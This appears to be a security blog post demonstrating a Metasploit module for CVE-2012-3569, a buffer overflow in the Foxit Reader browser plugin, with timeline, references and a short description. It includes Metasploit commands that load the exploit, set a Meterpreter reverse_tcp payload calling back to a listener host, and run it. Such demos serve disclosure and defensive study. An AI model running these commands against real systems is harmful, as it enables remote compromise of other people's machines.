aka wow on ZATAZ.com
Foxit Reader Plugin URL Processing Vulnerability Metasploit Demo
Timeline :
Vulnerability discovered by rgod the 2013-01-07
Vendor public release of the vulnerability the 2013-01-14
Metasploit PoC provided the 2013-02-12
PoC provided by :
rgod
Sven Krewitt
juan vazquez
Reference(s) :
CVE-2012-3569
OSVDB-89030
BID-57174
Foxit Bulletin
Affected version(s) :
Foxit Reader 5.4.4 and earlier
Foxit PhantomPDF 5.4.2 and earlier
Tested on Windows 7 Integral SP1 with :
Firefox 18.0.2
Foxit Reader version 5.4.4.11281
Description :
This module exploits a vulnerability in the Foxit Reader Plugin, it exists in the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts, overly long query strings within URLs can cause a stack-based buffer overflow, which can be exploited to execute arbitrary code. This exploit has been tested on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281 (npFoxitReaderPlugin.dll version 2.2.1.530).
Commands :
use exploit/windows/browser/foxit_reader_plugin_url_bof set SRVHOST 192.168.178.26 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.26 exploit getuid sysinfo
I recommend you to read these related posts
- EDB-ID-15532 : Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
- CVE-2010-3867 : ProFTPD IAC Remote Root Exploit
- CVE-2011-0073 : Mozilla Firefox nsTreeRange Dangling Pointer Vulnerability
- CVE-2011-2371 Mozilla Firefox Array.reduceRight() Integer Overflow Metasploit Demo
- CVE-2011-0065 : Mozilla Firefox mChannel use after free vulnerability Metasploit Demo
- CVE-2006-3677 : Mozilla Suite/Firefox Navigator Object Code Execution
- MS12-020 Microsoft Remote Desktop (RDP) DoS Metasploit Demo
- CVE-2010-3765 : Mozilla Firefox Interleaving document.write and appendChild Exploit
- CVE-2012-4914 Cool PDF Image Stream Buffer Overflow Metasploit Demo
- OSVDB-68514 : Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
- 1 Reply
- 0 Comments
- 1 Tweet
- 0 Facebook
- 0 Pingbacks
